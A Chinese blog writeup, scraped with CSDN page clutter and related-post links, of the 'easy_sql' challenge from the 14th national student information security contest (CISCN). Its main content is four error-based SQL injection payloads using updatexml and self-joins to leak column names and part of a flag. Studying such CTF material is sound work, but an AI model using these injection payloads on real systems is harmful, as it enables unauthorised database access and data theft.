第十四届全国大学生信息安全竞赛第一题wp

最新推荐文章于 2023-06-05 16:02:07 发布

孤桜懶契

最新推荐文章于 2023-06-05 16:02:07 发布

阅读量560

点赞数

分类专栏： CTF

本文链接：https://blog.csdn.net/qq_35938621/article/details/116895330

版权

本文详细解析了第十四届全国大学生信息安全竞赛的第一题，主要涉及SQL注入技术。通过报错注入获取了FLAG的字段名id和no，然后逐步揭示了FLAG的完整内容，使用substring函数显示了FLAG的前后部分。

摘要由CSDN通过智能技术生成

easy_sql

1、通过报错注入获取flag的字段名id

1') or updatexml(0x2e,concat(0x2e,(select * from(select * from flag as a join flag b)c)),0x2e)#

2、通过的方式获取flag的字段名no

1') or updatexml(0x2e,concat(0x2e,(select * from(select * from flag as a join flag b using(id))c)),0x2e)#

3、在获取id及之后字段名no字段名’b803ed64-14a9-474f-9832-b854b23d3014’

1') or updatexml(0x2e,concat(0x2e,(select * from(select * from flag as a join flag b using(id,no))c)),0x2e)#

4、通过字段名获取flag的一部分

需要将单引号该成反引号
`b803ed64-14a9-474f-9832-b854b23d3014`

1') or updatexml(0x2e,concat(0x2e,(select `b803ed64-14a9-474f-9832-b854b23d3014` from flag)),0x2e)#

TH syntax error: 'CISCN{z9ZeE-peOfv-Wemp4-GE5FV-51&

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

孤桜懶契

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
打赏
1
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

2021第十四届全国大学生信息安全竞赛WP（CISCN）-- pwn部分

lifanxin的博客

05-17

1万+

CISCN_2021_WP概述ciscn_2021_lonelywolf总结概述作为学习不到一年的练习生，今年第一次参加国赛，本以为题目会比较温柔，但是最后只做出了一道pwn题，本来还有两道pwn题是有机会的，但还是缺少一些知识或者技巧吧，没做出来，然后就结束了。本次国赛pwn题出了一道arm 64位结构的，其余都是正常的linux下pwn题，使用libc-2.27.so，有一道考了沙箱机制。 ciscn_2021_lonelywolf ciscn_2021_lonelywolf libc-

第十四届全国大学生信息安全竞赛部分wp

qq_46540840的博客

05-16

1万+

第十四届全国大学生信息安全竞赛部分wp前言MISC-Robotmisc running_pixel密码学RSAweb1Re1web2总结前言第一次参加国赛,更让我清楚意识到自己是fw,做出几道题记录一下,期待自己的进步成长 MISC-Robot 下载得到结合题目是机器,要求是找字符,百度一下rspag后缀名打开文件,看样子是要找坐标了正好给了流量包wireshark打开追踪tcp流量,找坐标关键字眼,找的话有点麻烦直接搜pos看到关键内容这里采用正则表达式直接提取出来正则yyds pytho

1 条评论您还未登录，请先登录后发表或查看评论

2021全国大学生信息安全竞赛初赛部分WP

weixin_45844670的博客

05-17

4034

第一阶段 Misc tiny traffic 分析pcap包，能发现几个可疑的请求——/flag_wrapper、/test、/secret，分别把它们传输的文件提取出来，得到三个压缩包，通过flag.gzip的内容可以确认这个IP就是我们要分析的IP 再使用Peazip分别提取secret和test的压缩包，能发现传输的格式规范 syntax = "proto3"; message PBResponse { int32 code = 1; int64 flag_part_convert_to_h

第十六届全国大学生信息安全竞赛 ——创新实践能力赛线上初赛------WP

最新发布

m0_75178803的博客

06-05

1058

通过测试和题目名称得知存在python沙盒逃逸并且一次只能输入7个字符串，使用+进行拼接调用eval函数成功执行命令。用wireshark打开modbus.pcap文件，追踪TCP流。个字符（A-Z,2-7)组成，末尾可能会有‘=’，但最多有6。进行base32解密即可得到flag值。NSSCTF的CISCN的赛后环境。base32加密特征：密文由。逐条输入指令得到flag。【1】被加密的生产流量。

2020第十三届全国大学生信息安全竞赛大部分题目

08-22

除了pwn类题和web的easy_unserialize全都有

2019第十二届全国大学生信息安全竞赛个人web wp

kkkkkkkkroc的博客

04-22

3911

先吐槽一下这次比赛时常两天好累的说，太菜了，知识答题题目分值比例好高。 web题目不多。题目不多，好难做。绕的头皮发麻，另外math函数构造的时候，很烧脑。各位师傅各种骚姿势。题目名称：JustSoso 变量引用绕过和parse那个函数的漏洞 <?php class Handle{ private $handle; public function __wakeu...

第15届全国大学生知识竞赛 2022ciscn初赛部分wp

blowed的博客

05-31

1580

Misc ez_usb 1.键盘流量 USB协议数据部分在Leftover Capture Data域中，数据长度为八个字节。其中键盘击键信息集中在第三个字节中。如图，发现击键信息为0x06，即对应的按键为C 2.鼠标流量 USB协议鼠标数据部分在Leftover Capture Data域中，数据长度为四个字节。其中第一个字节代表按键，当取0x00时，代表没有按键、为0x01时，代表按左键，为0x02时，代表当前按键为右键。第二个字节可以看成是一个signed byte类型，

第14届全国大学生信息安全竞赛-1sNone

m0_51257365的博客

06-04

146

第14届全国大学生信息安全竞赛-1sNone ps：这次比赛题目tnl，菜dog全程懵逼，三套题，懵到底，呜呜呜，看大师虎们乱杀，自己就做出了几道。还是写个wp记录一下这次比赛难度比上一届又大了，而且赛制也变化，有点不适应。不过主要还是能力不到位，队内各个方向的同学学的还是比较少，很多题目有思路但做不出来，还是练的少，见的少了。继续学叭，来年再战。 web easy_source ?rc=ReflectionMethod&ra=User&rb=q&rd=getDocComment

第十二届全国大学生信息安全竞赛-RE部分WP(目前前两题，待更)

WocW的博客

04-22

1390

RE2-bbvvmm 分析拖入IDA，题目流程基本呈现，直接看到最后的check 这里即，用户名和密码都在此验证。密码最终得到的结果在ptr+25，而用户名得到的结果，像是经过一系列字符处理，最终与明文对比。这里这个明文一看非常像base64，尝试在线解base64，发现不对。经过动态调试发现是经过sub_400A6后，字符串才变为base64模样，说明在之前还有加密。base64是一种很容易...

全国大学生信息安全竞赛安徽省赛-初赛WP

qq_43647197的博客

10-14

1033

全国大学生信息安全竞赛安徽省赛-初赛WP

第十四届全国大学生信息安全竞赛-线上赛Writeup

热门推荐

末初的CSDN博客

05-16

1万+

第十四届全国大学生信息安全竞赛

大学生网络与信息安全竞赛题目

jachinFang的博客

10-25

2787

题目：截获了敌军命令密文454242 424545 42454245 42 45454245，你能解密成明文，做到知己知彼吗？答案：wdctf 解析：45 代表- 42代表* 因此可以联想到摩斯密码 *代表- -代表. 所以 454242 424545 42454245 42 45454245代表 .-- -.. -.-. - ..-. 题目：BAABAABBAAAA...

第十六届全国大学生信息安全竞赛创新实践赛初赛部分WP AGCTF战队

akxnxbshai的博客

05-29

1807

第十六届全国大学生信息安全竞赛创新实践能力赛初赛，AGCTF战队wp

全国大学生信息安全竞赛初赛writeup（历年CISCN真题与解析）

Hardworking666的博客

02-12

1万+

文章目录第十四届（2021年）第十三届（2020年）第十二届（2019年）第十届（2017年）收录了大佬们参加全国大学生信息安全竞赛初赛的writeup，方便学习，排名不分先后，谨参考完整度和CSDN站内优先原则。对大佬们的分享表示由衷的敬意和诚挚的感谢！ 第十四届（2021年）末初——第十四届全国大学生信息安全竞赛-线上赛Writeup 作者：BL、Evan、PYozo、末初编辑：白帽子社区运营团队——红色代码战队 第十四届全国大学生信息安全竞赛-线上赛Writeup 暗刃攻防实验室——2..

全国大学生信息安全竞赛writeup--暗号(reverse300)

jmp esp

07-10

6177

描述 George是一名FBI特工，昨天他获得了一个命令，在今天晚上纽约林肯中心的大都会歌剧院的演唱会上，将会有恐怖分子出没。George下午结果了一名恐怖分子，在他的身上发现了一个U盘，里面有这样一个程序。George看了程序之后，决定将自己伪装成刚解决掉的恐怖分子的身份。请你帮助George获得这名恐怖分子的姓名和暗号。注：为MadFrog生成注册码tips：flag是flag{暗号}附件描述

全国大学生信息安全竞赛writeup--拯救地球(reverse500)

jmp esp

07-10

3991

描述什么？地球要爆炸了，据说拯救地球的代码就在这个程序里。使命貌似光荣又艰巨…tips：flag是flag{结果}附件描述：文件名：程序校验（SHA1）：D78073A4C06468DFC95822A764D792C09A87F78A思路打开看，一个question,逆向发现加壳了，不过这个壳还好比较裸，目测通过加断点dump dex可行，不过把这个东西自动化了，直接找了一个工具就脱了。工具地址

2022-第六届”蓝帽杯“全国大学生网络安全技能大赛 wp（WriteUp）

一位热爱网安的年轻人的博客

07-10

933

第六届”蓝帽杯“全国大学生网络安全技能大赛 wp

WP2DRR安全模型：蓝鲸智云配置平台的信息安全体系

"蓝鲸智云配置平台白皮书探讨了信息安全体系的构建，特别是引入了WP2DRR安全模型，这是一个基于时间的模型，包括预警、策略、保护、检测、响应和恢复六个核心环节。此外，文件还概述了信息安全建设的思路、内容、...